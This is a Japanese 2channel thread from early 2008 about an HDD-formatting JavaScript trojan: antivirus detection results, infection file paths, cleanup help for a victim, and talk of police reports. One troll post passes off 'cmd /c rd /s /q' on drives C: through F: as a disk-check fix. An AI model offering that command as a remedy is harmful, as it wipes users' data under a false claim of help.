>>171
どうもありがとうございました。

>>172
うんこをたべなさい。

>>6
Jane doeでよかった

「拡張子ではなく、内容によってファイルを開く」なんて仕様にしたＭＳってバカなの？

その論理だとアップルはもっと馬鹿だな

avastは更新したがこれには対応していない

avast・・・

データフォーク

>>179
「拡張子によって、適切なプログラムで適切な手順でファイルを開く。それ以外に動作させない。」
なら宜し。IE6の脆弱性と捕らえて宜し。

結局ウイルスバスターはまだ対応してないのか？

ウイルスバスター（笑）

ちゃちゃか　すかちゃか　ちゃちゃ　ぷー
ウイルスバスター（笑点）

ＧＴドライバー柳田（笑）

このスレ住人じゃ知らないか？（ｗ

すまんが>>123をバカなオレでもわかるように翻訳してくれ
「平気でぶち抜いて来る奴」が意味はおろかイメージさえ湧かん
2chでわけのﾜｶﾗﾝ言葉に出会ったの実には５年ぶりぐらいだｗ

「NISとAntiVirを同時常駐させてる馬鹿もいるのに」ってことじゃないの？そう解釈したけど。
ってかAntiVirを使いこなせるだけのスキルがあるなら同時常駐やめろよｗ

尼に行くと、ＮＩＳとＮＡＶの同時購入を勧めてるよｗ

ttp://www.amazon.co.jp/gp/product/B000VP9RPS/ref=amb_link_18891206_3/249-8856624-6853908?ie=UTF8&me=AN1VRQENFRJN5&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=center-2&pf_rd_r=03ZTZTJP8JFN8V02XXWP&pf_rd_t=101&pf_rd_p=86667506&pf_rd_i=1040116

>>189
信頼性の高いウイルスソフトウェアでも対応できてないウイルスって意味じゃないの？

AntiVirとNAVは全然違うだろ？

>>6見ると、doeは大丈夫とあるんですけど、
ウチのは、
JaneDoe View α ( build date: 061208 )
なんですが、大丈夫と言うことでしょうか？

うむ、セーフだ

だいたいさ。大丈夫？ってカキコできてんのに、なに言いたいわけ？
そんなやつは、うんこをたべなさい。大丈夫だから。

バスターとAVG一緒にいれても大丈夫ですか？

私は、バイブとちｎこ一緒にいれても大丈夫でした

>>198
bot1.4とAVG7.5で問題なく使えてる。bot1.5は知らん。

>>160
kasperskyが下の名前で検出する方は本日未明Esetに検体送った。
http://www.virustotal.com/analisis/f205c97204f0185d9d4c73e8957f01dc

最初の1230の方は、誰かが送ると思ってもてあそんで捨てた。
VirusTotalで何度も再検査したのでVirusTotalからベンダーの方に行ってないかな。

>>198
すまん見間違えた。バスターね。バスターは無理ではないが止めた方がいい。
理由はググレばわかる。

まとめサイトに書いてある、これどーいうこと？
自己で対策してないPCでも大丈夫なん？

>既に沈静化しました。新たに感染することはありません。

HDDをフォーマットするブラクラ まとめwiki - トップページ
http://www13.atwiki.jp/burakura_hdd/

もっと先まで読め。
＞報告にも偽のものがあるようなので注意。

本当かどうかの裏を取れないやつがwikiのホストやってもしょうがない

>>202
サンクスです！
ググってみます

危険ポートを閉じることでセキュリティを強化する。

【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下：DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。

ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。

ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。

ポート135 445
ttp://www.google.com/search?hl=ja&q=%E3%83%9D%E3%83%BC%E3%83%88135+445&lr=lang_ja

>AntiVirを使いこなせるだけのスキル
AntiVirの操作性はすんごく理にかなっていて優れると思う。
ＵＩが洗練されてるというか、英語であることを差し引いても
使いやすい。ちなみに個人的にもっとも使いにくいと思うのが
nod32。amonとかimonとか変に分離しちゃって抵抗感がある。
NISも使いにくい部類。

カスペも使いにくいよ。
逆にセキュ板で叩かれてるバスターはなんだかんだいっても使い勝手はいい。
ま、有料ソフトはカスペ系以外全滅なのは残念だ。
馬鹿フィーはそれ以前に糞すぎるので失せろという感じだけど。

カスペ以外全滅なんだけど→⇒それでも、それに続くのは唯一バスターということですね？ｗ

沈静化したっぽいが、気になる人もいそうなので一応貼る。

2008年1月2日 20:00頃 VirusTotal再解析結果
http://www.virustotal.com/jp/analisis/d9c375d91347f2c66b00348869fa73f3

【対応済（8本）】
アンチウイルス　　　　 更新日　　　結果
AntiVir　　　　　　　 　　2008.01.02　TR/Dldr.Agent.aqr.20
AVG　　　　　　　　　　　2008.01.01　Small.2.BJ
F-Secure　　　　　　　　2008.01.02　Trojan-Downloader.JS.Agent.aqr
Ikarus　　　　　　　 　　2008.01.02　Trojan-Downloader.JS.Agent.aqr
Kaspersky　　　　　 　　2008.01.02　Trojan-Downloader.JS.Agent.aqr
Microsoft　　　　　　　　2008.01.02　TrojanDownloader:JS/Agent.JG
Sophos　　　　　　　　　 2008.01.02　Troj/Iframe-N
Webwasher-Gateway 2008.01.02　Trojan.Dldr.Agent.aqr.20

【メジャー所で未対応】
Avast　　　　　　　　　2008.01.01
BitDefender　　　　　2008.01.02
McAfee　　　　　　　　2007.12.31
NOD32v2　　　　　　 2008.01.02
Symantec　　　　　　 2008.01.02
VirusBuster　　　　　2008.01.01

Microsoft、対応したなぁ．．．御三家、面目丸つぶれだのう。

MSのは対応したといってもそれはOneCareではなく企業向けの方だろ？

>>210
有料ソフトだと、F-Secureも早かったよ。まあ、カスペエンジンだからかもしれんけど。

未だに対応してない会社は潰れたほうがいい

ｽﾏﾝﾃｯｺと馬鹿フィーはさっさと潰れろ

カスペってバグ多い気がするんだけど、日本語版だけ？

　　　_、_
　（　,_ノ` ） 　 　　　n
￣　　 　 ＼　 　 （ E） ｱﾎﾞｼﾞにおまかせ!!
ﾌ AVG /ヽ ヽ_／／

このスレの>>80をクリックしてしまいました
本当にリンク先に行っていいかを確認する「よろしければクリックしてください」という画面に
いったんですがなんか怖くなってそこで閉じました　大丈夫でしょうか？

http://namidame.2ch.net/test/read.cgi/news/1199269366/l50

>>212
あれ、そうなの？　ちょっとVirtual PCで試してみるんで、報告待ってて。

間可否ーのなんたらがインストールされていません・・・が出て
筆ぐるめが使えず。
いろいろやってたらファイルが消えたんですが・・・・
これってやばくない？

>>212
ご期待に添えず残念ですが、OneCareで検出隔離できました。検出名称：TrojanDownloader:JS/Agent.JG
なんで、MicrosoftのOneCareも対応済みで間違いないです。（Virtual PC + 体験版ですが）

御三家、早く対応しろよ〜．．．M$に負けてんじゃねぇか。(w

>>221
いや別にいいけどVirustotalにしてもAV-Test.orgにしてもただ単に「MicroSoft」しか載せてないからややこしい。
しかも個人向け（OneCare）と企業向けは検出率は違うとも公表してるから第三者機関でもはっきりさせて欲しい。

あと御三家なんてウイルスセキュリティの足元にも及ばないカスソフトでしょ。

>>222
まあ確かに。

こうなってくると、御三家で最初に対応する所と、一番最後になるのがどこかって所にポイントが変わる。

正直、興味津々．．．御三家のどこが対応最初だろうね。

>>218
さて、別のことしてて遅れたが、

>本当にリンク先に行っていいかを確認する「よろしければクリックしてください」という画面に
>いったんですがなんか怖くなってそこで閉じました　大丈夫でしょうか？

ついでにVirtual PCで確かめてみたが、クリックして最初に行くのはimu.nuという転送サイトだから、
そこで閉じていれば実際にはリンク先に飛んでないから大丈夫。

リンク先に飛んでいくと、今回のトロイ騒動で最初に出てくるエロ画像が表示される。
これ、元のトロイの話知ってないと、どっきりも何もしないわな。

>>224
まじありがとうございます！
安心しました！！

ここＩＤないんですね
すいません２１８でした
感謝です

２月でノートン切れるし、消してAVG入れようかと思ってるんですが、
ノートン関連を綺麗に全部消さないとマズい？

ぎぎぎのアドレスを踏んで２，３日目が経過しＰＣ終了せずに
今頃になってスタートアップ見て感染されたのが確認できたのですが･･･
感染したということはもう手遅れなんでしょうか？

>>228
２,３日の間は問題なくＰＣ作動してたのですか？

>>229
ＩＥが重く感じることがありましたが･･･
勝手にフォーマットされたりだとかということは何もありませんでした。

ぎぎぎのアドレスというのはどこで踏んだのですか？
２ちゃんねる内のものですか？

>>231
２ちゃんねるにぎぎぎのアドレスがあったのでつい踏んでしまいました

>>232
そのものズバリを踏んだのですか
踏んだら言われてるよな画像が出たりしましたか？

AmiLaLa騒動を思い出した奴・・いる？

>>233
例の画像が出ました。
そのあとも何度も出てくるエラーを慌ててエンターキーで沈めた後そのブラウザを閉じました
その間、ノートン先生が何度も反応してましたが、内容は覚えてません･･･。
それからＰＣは終了せずにサイト徘徊やらしてました。
今頃になって危険なウィルスだったということを知った状況です･･･。

スタートアップでも見てみれば良いかね。
例のbatファイルがあれば食らってるからautoexec辺りもチェック、って所か。

>>235
大変でしたね…スタートアップにはなんというファイルがありましたか？
WinUpd91.txt .bat でしょうか？

>>237
まさにそれがありますね･･･これ削除したほうが良いんでしょうか？

あるちゅうことは思い切り食らってるな。マシンを数日間再起動してないから助かってるという。
そのまま再起動したらトロイが動いてあぼんするな。

>>238
いや私も初心者でそこのとこがよくわからなくて
お役に立てずすいません…

>>239
こ、こわ･･･奇跡的に生きているということか･･･
とりあえずこれ削除したあと、どうすれば良いか分かりますか･･･？

まず必要なファイルを逃がしておいたら。
KIS7の体験版を落としてチェック。
駄目もとでファイルを削除。
次にDAEMONで仮想CDをDとZに設定してトラップを張る。

スタートアップって左下のスタートってとこから全てのプログラムってとこの
ことですか？初心者ですいません

>>238
ニュース速報板ではスタートアップにあるファイルを削除だけで
問題なく再起動できたという報告があがっていた。
が、対応してるアンチウイルスソフト使って駆除を試みた方がいい気がする。
niftyのオンラインスキャン・・・でも感染した人は途中エラーで中断させられたらしい。
>>242
カスペ体験版はインストール後に再起動を要求されるというとんでもないジレンマだったらしい。

>>242
駄目もとでファイルを削除って言うのは例のスタートアップにあるファイルですよね？
とりあえず、その手順を踏んでみたいと思います。

>>243
スタートアップの場所はＷｉｋｉにかいてありますよ

>>244
おおっと･･･そうなんですか･･･
とりあえずスタートアップのやつはにくいので消しときます

　　　　　 ／￣￣￣￣￣￣ ＼
/⌒ヽ　 /　''''''　　　　　''''''　　　ヽ
| 　/ 　 |　（●）,　　　､（●）　　　|
|　|　 　|　　　 ,,ﾉ(､_, )ヽ､,,　　　　 |
|　|　 　|　　　 ｀-=ﾆ=- '　　　　　 |　　
| ｜　　 ! 　　　 ｀ﾆﾆ´　　　　　　.!　　 　　　天狗じゃ、これも天狗の仕業じゃ！
| /　　　 ＼ ＿＿＿_＿＿＿ ／
| |　　　　///／Ｗ＼ヽヽヽヽ＼
| |　　　////ＷＷＷヽヽヽヽヽヽヽ
| |　　////ＷＷＷＷヽヽヽヽヽヽヽ
Ｅ⊂////ＷＷＷＷＷヽヽヽヽヽヽヽ
Ｅ／///　　　　　　　　　ヽヽヽヽヽヽヽ
| |　 //ＷＷＷＷＷＷＷヽヽヽヽヽヽヽ

　　　　　　　　　　　　, ;,勹
　　　　　　　　　　 ノﾉ　　　`'ﾐ
　　　　　　　　　 /　y　,,,,,　 ,,, ミ
　　　　　　　　　/ 彡　`ﾟ　　 ﾟ' l
　　　　　　　　　〃　彡　　"二二つ
　　　　　　　　 |　 彡　 　~~~~ミ　　　 　　はいはい、わしのせい　わしのせい
　　　　　,-‐― |ll　　川| ll || ll|ﾐ―-､
　　　／　　　　　|ll　　　　　 　 |　　　ヽ
　　/　　　　　　　z　W`丶ノW　　　　　ヽ
　/　　　　　　　　＼＼　　 / /　　　　　 |
/　 　　天　　　　　　＼`i　/ /　　狗　　 |

>>スタートアップの場所はＷｉｋｉにかいてありますよ

見ましたがどうも私には難しくてよくわかりません
どうすればスタートアップというものをみれるんでしょうか？

ＸＰ　ＩＥ６　です

>>249
少しはぐぐれ

C:\WINDOWS\ｽﾀｰﾄ ﾒﾆｭｰ\ﾌﾟﾛｸﾞﾗﾑ\ｽﾀｰﾄｱｯﾌﾟ

感染確認
心配な人、↓にbatファイルが無ければおｋ

スタートアップ
Windows 9x/Me
C:\WINDOWS\All Users\ｽﾀｰﾄ ﾒﾆｭｰ\ﾌﾟﾛｸﾞﾗﾑ\ｽﾀｰﾄｱｯﾌﾟ\BugFix[ランダムな数値].txt(空白).bat
Windows NT/2000
C:\WINNT\Profiles\All Users\スタートメニュー\プログラム\スタートアップ\IE_Up[ランダムな数値].txt(空白).bat
Windows XP
C:\Documents and Settings\All Users\スタート メニュー\プログラム\スタートアップ\WinUpd[ランダムな数値].txt(空白).bat

AUTOEXEC.BAT
Windows 9x
C:\AUTOEXEC.BAT .txt
Windows XP
C:\WINDOWS\SYSTEM32\AUTOEXEC.NT .txt

クイック起動
Windows 9x
C:\WINDOWS\Application Data\Microsoft\Internet Explorer\Quick Launch\AntiVirus[ランダムな数値].txt(空白).bat
Windows 2000/XP
C:\Documents and Settings\All Users\Application Data\Microsoft\Internet Explorer\Quick Launch\SecurityAlert[ランダムな数値].txt(空白).bat

http://www.nifty.com/security/vcheck/?mid=601287&lid=20
後、だめもとでniftyのオンラインウイルスチェックね。
これで検出できて駆除できたら楽だろうとは思うが、
途中で止まる場合は手動で消すしかないかもな。

>>253
バックアップ作業してるのであとでやってみます
手動で消すのがどうやるか微妙なところですが･･･

>>249
まず、
WindowsキーとEキーの同時押しでエクスプローラーが立ち上がる
※IEじゃないぞ
立ち上がったら、左側のツリー構造の中から
「+マイ コンピュータ」って部分を探し出す
見つけたらこの「マイ コンピュータ」の部分をクリック
※マウスの左ボタン１回押しのことね
これで選択状態になったと思う
※いじって無ければ「マイ コンピュータ」の部分が紺色になったかな？
そしたら、テンキーの「*」を押すんだ
よし、ここまでやってみて！

あ、ちなみにAUTOEXEC.BAT は無くって
クイック起動は
C:\Documents and Settings\All Users\Application Data\Microsoft\
まではあって
Internet Explorerフォルダ自体が存在しなかったんですが･･･
感染はスタートアップだけに抑えられてるということなのかな･･･

>>211
なんでVirusBusterがメジャーなのかと思ったけど、virustotalに出てるVirusBusterは
http://www.virusbuster.hu/ だからトレンドマイクロとは違うよ

>>256
エクスプローラを開いたら、ツール(T) → フォルダ オプション(O)を選んで、
表示 → 詳細設定の項目から

・ファイルとフォルダの表示 → すべてのファイルとフォルダを表示する　を選ぶ
・保護されたオペレーティング ファイル システムを表示しない(推奨)のチェックを外す

この2つをやらないとAUTOEXEC,BATは見えない。（無いように見える）

うかつに再起動しないようにね。　正直、貴方の書き込みを見ていると、どうもシステムが吹っ飛ぶかどうかの
瀬戸際にいるように見える。

ああそっか、デフォ設定だとそうなってるから見えないんだっけ
慣れてると真っ先につつく項目だから忘れてた

>>257
何という落とし穴。(w

こっちの仮想環境のバスターでも未だに検知できないんで、てっきりVirusTotalの方もバスターだと思ってた。

じゃあ、バスターの方は私の仮想環境で確認続けて、検出できるようになったらスレに報告入れるね。

削除でいけるような気がするが。
初心者でなく自作PCだったら余計なHDDは電源を落とした際にすべて切り離すんだが。
嘘か誠か解らんが、ターゲットとなるC以外のHDDが無い場合はDVDプレイヤーを壊すとか壊さないとか。
だからDAEMONで何かをマウントしておき、DVDドライブの両脇にトラップで張りつかしておければ。
それにはコンピューターの管理からドライブのパスを変更しなくちゃいけないんだけど初心者じゃ無理だし。

>>255
今からやってみます！

>262
無事に帰還することを祈る。

>>258
最初からその設定にしてるので隠しフォルダは見えてるんです。
C:\Documents and Settings\All Users\Application Data\
↑が隠しフォルダ
それ以降の\Microsoft\Internet Explorerは隠しフォルダじゃないはずなのにもともと存在しないという･･･

（ウイルス感染確認方法）

http://www.google.co.jp/
↑すでにこのＵＲＬの色が変わっていたらアウト





おっとsageるの忘れたスマソ

>>264
うちも今見てみたけどIEフォルダなし
気にしなくていいと思うよ

>>263
どういう意味？

1/3 0:54現在
http://www.virustotal.com/jp/analisis/1356327f99e9fd9f3fb225412a057430

あれ、対応8本から7本になってる

>>256
ごーぐるは有名ですよねぇ

>>264
自分のマシン調べてみたけど、どうも All Usersじゃなくて、各ユーザー毎の方か？（Wikiの間違い？）

ただ、自分のマシンで調べたところでは、このクイック起動の Quick Launch フォルダは、そのまんまスタートの横の
クイック起動のアイコンを示しているらしい。（このフォルダのアイコンを消すと、スタートの横のアイコンも消える）

だとすれば、とりあえず再起動時にクイック起動内のファイルが自動実行されることはないはずだから、
フォルダがなければ無視しても、とりあえず再起動に関しては大丈夫なはず。

はず、ばっかりで申し訳ないが、スタートアップとAUTOEXEC.BATを対処すれば、いけるんじゃないか？
あとは、とりあえずやること全部やったら、再起動時に画面を見ていて、フォーマットしそうになったら電源を切るくらいか。

後ガセネタだろうとは思うけど、再起動時した後に.batが作り直された
という報告もあったな。再起動後も安心せずにスタートアップは電源切る前にチェックしとくこと。

>>270
ほんとだ･･･各ユーザーのところに存在しやがった･･･orz
Wikiに追記したほうがいい気が･･･

>>272
ミスｗ
フォルダはあって問題のファイルは無かったｗｗ
はやとちりｽﾏｿｗ

>>255　の
＞そしたら、テンキーの「*」を押すんだ

を試すと変なことになるな

>>274
やったんですか？どうなりました？

エクスプローラーが暴走する感じ
CPU使用率が１００％くらいになってHDがガリガリ言い出す。
タスクマネージャーで見ると
マイコンピューター　（応答なし）　　の状態。

愉快犯が混じっているから気をつけないと。

>>276
電源切ってしばらくほっとけば問題ないんでしょうか＞

>>278
タスクマネージャーで「タスクの終了」で止めた。
慌ててると思わず再起動したくなるよ。

>>277の言うように愉快犯だと思う。

>>279
報告ありがとうございます

>>253　のニフティ　ウィルスチェックってエンジン何使ってるのかな？
対応済みならいいけど・・
>>221によれば　OneCareも対応済みとのことなので
http://onecare.live.com/site/ja-jp/center/howsafe.htm?s_cid=mscom_msrt

はどうかな？

感染してるか調べる方法がいろいろあるようですが
どれがかくじつですか？

ぶっちゃけ、買った時の状態に戻せばOK？

Javascriptを無効にして重要なファイルを定期的にバックアップとっときゃ
怖いものはないでしょ

>>282
チェックディスクコマンドを試してみ。

1.[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q c:
と入力し[OK]をクリックする。

上記と同様に以下も順に実行する。
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:

これでレジストリの破損やメモリのキャッシュなどがクリアされて正常になる。
HDD内も綺麗にリフレッシュされるのでオススメ。
事前予防にもなるので、やった事がなければ試してみる価値あり。

>>285
お前！
いい加減にしろよな！！

>>285
見事に何も無くなりスッキリしますた！！
ありがとうございます！

ファイルの検索でbatファイル検索すればいんじゃない？

バックアップは大体完了。
あとは削除されても･･･まぁ･･･

とりあえずウィルススキャン終わったら再起動してどうなるかみます

でも、もしフォーマットされそうになって強制終了したところで、
次の一手はどうなるんだろうｗ

>>289
セーフモードから削除

これってさ、Dドライブから順にフォーマットしてくんですよね？
誤消去防止して物理的にフォーマットできなくしたメディアとかDドライブに入れといても
素通りしてE→F→Gって進んじゃうんですか？

>>291
多分Dドライブどうにかしただけで終了

>>290
なるほど･･･

ってかウィルススキャン未だに４０％･･･
朝までかかるなぁ

あれ、終わった。
では再起動してきます。生きていたら結果報告もしたいと思います

>>294
ど、どう？

ｗｋｔｋ（AAｒｙ

ﾜｸﾜｸ(((；ﾟДﾟ)))ﾃｶﾃｶ

まんまIEでavast突っ込んであるだけだけどもう大丈夫なの？

>228オワタｗｗｗｗ

再起動にしては時間がかかり過ぎてるねｗ

もしかして脂肪しちゃった？ｗ

ttp://dangerous.org/virus-archives/troy.zip

俺これ踏んだけどどーすりゃいい？

>>302
注意力を養うといいよ

ちょっと寝ぼけててつい…

まずいかな？

>>294
生きてる？

うおおおお
こんなに期待されてるとは思わなかったｗ
結果はセーフでした！
期待にそぐわないですいませんｗ

詳しいスペック情報と行った対策っていりますかね？

時間かかったのは安全に起動したのを確認して飯食ってたからですｗ

２時間も・・・

俺は寝る。

食事は銃に弾を詰めるみたいなものだ、兵士は食べたくなくても食べなきゃいけない

ウイルスとの戦いがまだまだ困難を極めるというときに、我々は、学ぶべき人を次々と失っていく…


寒い時代だと…思わんか？

一応晒しておくとスペックはＶＡＩＯノートtypeF WindowsXP　ウィルスソフトは更新切れのノートン使用
ぎぎぎでうｐされてたファイル踏んで>>235のような状況。
まぁやったことといえば例のファイル削除と
OneCareでウィルススキャン（４個のファイルが見つかって削除・修復）

再起動後、一応ファイルが復元されてないかチェックしましたがありません。
ご教授してくださった方には感謝ですー

>>310
ご苦労さんですた。良かったね！　忘れられない正月だなw
ま、ゆっくり休んでくれ

でもインターネット徘徊だけでＨＤＤ全消去ってのは都市伝説だと思ってた･･･
プログラム詳しくないから分からんのだが
jpgにどうやってJavascriptとウィルスを組み込むんだろ？
jpgをメモ帳で開いてプログラム書き込めばできるのか･･･？

JPGに偽装させたHTML/JSファイル
過去に、A.JPG .EXE
みたいなファイルもあったな
クリックしたらアボーンのやつね。

>>310
これを機会にもっとセキュリティに気をつけような。
IE6よりIE7の方が安全性高いし、他にもファイアーフォックスとかIE系より頑強なブラウザもあるし。
更新切れのノートンなんてやめとけ。
金がないのならフリーのアンチウィルスソフトやらファイアーウォールやらもあるし。

セキュリティのレベルを「高」にして、JacaScriptをオフっておけばおｋ？
ワケあって、IE6です。

スマソ

x　JacaScript
o　JavaScript

訳？割れもの？

HDD_FORMAT_Virusを無理やり話題にしてるな。まあいいけどさ。
俺のＩＥのバージョンを確かめたら６だったよ。
元からIE7にするつもりも更々ないし、
元々IE6が大好きなんだよ俺は。

ま、Virusじゃないけどな

>>319
ネタの張本人現る（笑

http://www5.uploader.jp/user/tane/images/tane_uljp00206.jpg
IE6の設定はこれでいいの？

>>321
わりぃ。俺の所からそれは見れないからパス。

http://www.nih.go.jp/niid/virology2/HBV001.jpg

本物の木馬か鑑定よろしくおねがいします

そろそろこういったのも魔女狩りされたほうがいい

>>323
同じネタウイルスか（笑

>>321
おｋ。
つーか俺、プニルだからなぁ。。。

>>323
細菌or酵母？

321＝323
ビンゴ！

>>324
通報ってこと？

>>1
ま、あれだ。
「他人の糞ドシで相撲をとる」厨ウイルスってやつだ

定期的に見せしめは必要

>>330
具体的に、誰にだ。

>>331
画像掲示板も少々行き過ぎで連鎖でやられてたしな
知らないの？
ttp://gamushara.net/

>>332
画像掲示板に興味ねえ

ネット関係のガサ入れにうといな、コイツ
321も

www.gigigiが廃したらしいな。
真実かどうかはどうでもいいが。

何事もなさげにスレが消費されているけど
俺のカスペが>>321に反応するんだが・・
他の奴は何ともないのか？

>>336
自分で貼ったリンクだろ（笑

>>336
>>152-153の設定してる？

>>338
Live!2chで見てるから>>152-153は関係ないと思う。

「犯人」は必ず現場に戻ってくる

その犯人は腰抜けだった（笑

ああゆうのって仮に連絡する場合ここでいいの？
他にどこにある？
ttp://www.internethotline.jp/

>>341
インターネット・ホットラインセンターか
やっと自首するきになったか（笑

>>340
おまえだろ、犯人


>>341
各社メーカーが対応しないストレスをどこに吐くかだよな
通報はロハだし新年見せしめ一号欲しいべ

>>341
うーん、俺にはわからない。
すまん。

こういうのもあった
ttp://www.npa.go.jp/cyber/soudan.htm

>>343
罪を犯した者が、己が逃れるため他人を犯人扱いして逃げる。
やっぱり、腰抜けか（笑

書き込み文を考えとくか
ひょうたんからコマで捕まるやつほど楽しいものはないｗ

>>345
サイバー犯罪相談窓口は使えるのか（笑
使えるならここの　糞どしウイルス厨　を刑務所に入れてやれよ

>>346
おまえも考えろよ

>>349
お前と呼ぶな
最強のWin2000様と呼べ（笑

>>348
>>349
ちなみに>>321もアウトの範疇なんだろ？

>>351
厳密な話は向こうがやること
こっちは情報提供するだけ

千葉か田舎だな（笑

>>353
お上は身内には甘いが他人には手厳しいから一生懸命書けよ
なんにせよ遊び気分のやつも含めて元を断たねばならん

>>354
元断ちか（笑

しかし他にもやり方はあるだろう

今回の場合、被害にあったら
器物損壊（または精神的苦痛の障害罪）で刑事告訴したほうが良さそう

あと民事で損害賠償請求。

10:43:55 〜このスレッド以外に書かれたスレ

avast! Anti-Virus Part81
188 ：名無しさん＠お腹いっぱい。：2008/01/03(木) 11:01:16
ちょっと質問。現在の最新バージョンって
- プログラム： 既に最新です
(現在のバージョン 4.7.1098)
- Vps： 既に最新です
(現在のバージョン 080101-0)
これでおｋ？

これだな


コンピュータ若しくは電磁的記録を対象とした犯罪
電子計算機損壊等業務妨害罪、電子計算機使用詐欺罪等の刑法に規定されている犯罪のほか、ウイルスに感染したファイルを送って、コンピュータを正常に使用できない状態にした場合（器物損壊罪）などがあります。
コンピュータネットワークをその手段として利用した犯罪
電子掲示板を利用し、薬物等の違法な物品を販売する
インターネットに接続されたサーバコンピュータにわいせつな映像を置き、これを多くの人に対して閲覧させる
不正アクセス禁止法違反
コンピュータネットワーク上で他人の識別符号（ID、パスワード等）を無断で使用する
特殊な情報（クラッキングコード等）を入力し、他人のコンピュータへ侵入する
となります。

>>356
thx

誰かIPAには報告した？
でも明日からだな…

「初」某国内掲示板に、糞どしウイルスを貼り付けた厨が逮捕される。他にも余罪あり（笑

少なくとも身元特定されてブラックリスト入りになるといいな
>>358
thx

他スレッドの自作自演に篭ったか。
田舎者は腰抜けだった。（笑

353 ：最強のWin2000：2008/01/03(木) 10:43:55
千葉か田舎だな（笑

363 ：最強のWin2000＠XPに乗り換え：2008/01/03(木) 11:24:42
他スレッドの自作自演に篭ったか。
田舎者は腰抜けだった。（笑

いまだにIE6のヤツって割xp使ってるからだろｗ

意味がわからん

>>365
2kですが何か？

面白がって貼った奴も同罪になるな
過失はないだろう。

DOSコマンド厨もいい加減捕まって欲しい。

完全に悪意のあるやり方だし。

FF3になったら導入してやってもいいけどいつ正式版が出るのか気になる

サイバー犯罪調べてみたら
ttp://www.pref.toyama.jp/sections/6110/high-tech/cyber.html
県警では情報が多いな

これから年度末に差し掛かるし数もこなして社会反響も考えたらこれ面白いんだけどな

これって他国専用のHPも存在しているのか

ちくり連中の仕事は前触れがない
少し楽しみが増えたｗ

このブラクラが落とすBATファイルにAmiLaLaの名があって驚いたんだが何であまり騒がれてないんだ？
新参しかいないの？

>>373
やるときは標的は国内も含めてＡＬＬで・・・
数打ちゃ当たるを祈願したいねｗ
めでてぇ

頭いいやつは少なくとも国内サーバ使わないだろ

>>375
国内外誰でもいいｗ

筆ペンと封筒だと気持ちがこもってていいかな
さすがにスズリはないけどな

書初めかよ
でも人迷惑は罰を受けてもしゃーないな

コピペなら貼ってもいいみたいな風潮あるけどここらでひとつ決断が欲しいのは確か
じゃなきゃ風紀が保てなくなる

>>379
陳情書で検索すれば作法がわかる
蛇足だったら悪いな

すみません、感染してしまったんですがパソコンの知識が全くありません。　
中のデータだけでも守りたいのですが…

どのスレのどこ
ちょうどその情報が欲しかったところ

>>383
>>133

全て消えました。　
データも何もかも。　
どうしたらいいですか？　
これから…
パソコンは使いたいのですが…


感染は少女漫画板のNANAスレです。　
現行の２つ前くらいです

再起動してしまったのか

デジタルデータの民事訴訟の損害賠償ってどれくらい取れるものなんかな？

虚無感と脱力感で泣きたいです。　
なんとか普通に使えるように戻したいのですが…どうか助けて下さい。

>>63と>>321はどうなん？

>>386
ありがと。今月で●が切れる前でちょうどよかったわ。

バスターは対応してないのかい？

完全に逝ってしまいました。　
カスペアンチウィルス5でした。　
手の施しようがないのでデータは諦めようかと…

ハードディスクフォーマットされた奴はバックアップとかとってないの？ないなら諦めろ｡
大掃除だと思え｡
あとはアミララを恨め

>>388
金銭うんぬんより腹いせだわな

諦めるな、まず被害届けの手続きしてきたほうがいい。
まずどこで感染したかとかもメモしておいた方がいい。

で警察署へ行って掲示板のリンクにアクセスしたらPCが壊されたと器物損壊で被害届け出してくる。

あとは警察にまかせるしかないけどね

PCは現状保存で

>>393
バックアップありませんので諦めます。　
これからどうしたらいいでしょうか？　
初心者ですみません、教えて下さい…

>>393
人ごと過ぎるし、俺は借りは返す主義。

ボーッと見てたけど微妙に擁護してるやつって何？

>>396
電源押すとWindows起動する？

>>397
何するつもり？
アミララと対決？

>>399 起動します　
ネットも見られます　
データは全部消えました　
書き込みはできません　

>>398
少し後ろめたい事があるのだろう。俺はその人の気持ちを汲んで見逃さない。

アミララと一緒に泥船に乗ってもらう

ふむ・・・・何人釣れるかな

>>401
ＨＤ全消去だったらwindowsも根こそぎアウトで
起動しないしネットも見れないんじゃないの？

> 書き込みはできません　

？？？

これってWindowsUpdateとかじゃ防げなかったわけ？
Exploitとかそんな複雑なものじゃないの？

全部消えてから再起動していない…というか壊れている途中かもしれません　
今は携帯から書き込んでます

>>408
なんかホワイターの可能性の方が多くない？

>>408
あっちでも見かけたかもな
参考にさせてもらった
おれも同情節で参加させてもらうよ

>>409
いつのマルウェアだボケ

>>407
M$が放置プレーしてる
まだ数十件の放置プレーしてるよ。
多分2014年のXPサポート終了しても未修正の脆弱性は存在するだろうな

つまりあの企業体質を直さないと一緒無理

ホワイターとは？　
無知ですみません。　
今から何をしたらいいでしょうか？

陳情ネタにそのマルウェアの今昔関係ねーよ
はみ出したやつが負けｗ

>>411
あっちだとまだ現役だぞ。
新製品が出るたびに検出報告がある。

一緒
一生ね

|li _|￣|○ il|

自己責任の落ち度といえど訴えは余裕しゃくしゃく可能ってやつだわな

>>413
とりあえず警察行って被害届け

PCはそのまま現状保存しておかないといけない
（証拠保存）

お前ら誰と戦う気でいるの？ｗｗｗ
もうアホかと・・・

>>419
おまえ邪魔

当のスレに仕掛けた本人ご降臨。>>419

ウイルスURLをコピペした奴にも責任はあるからな

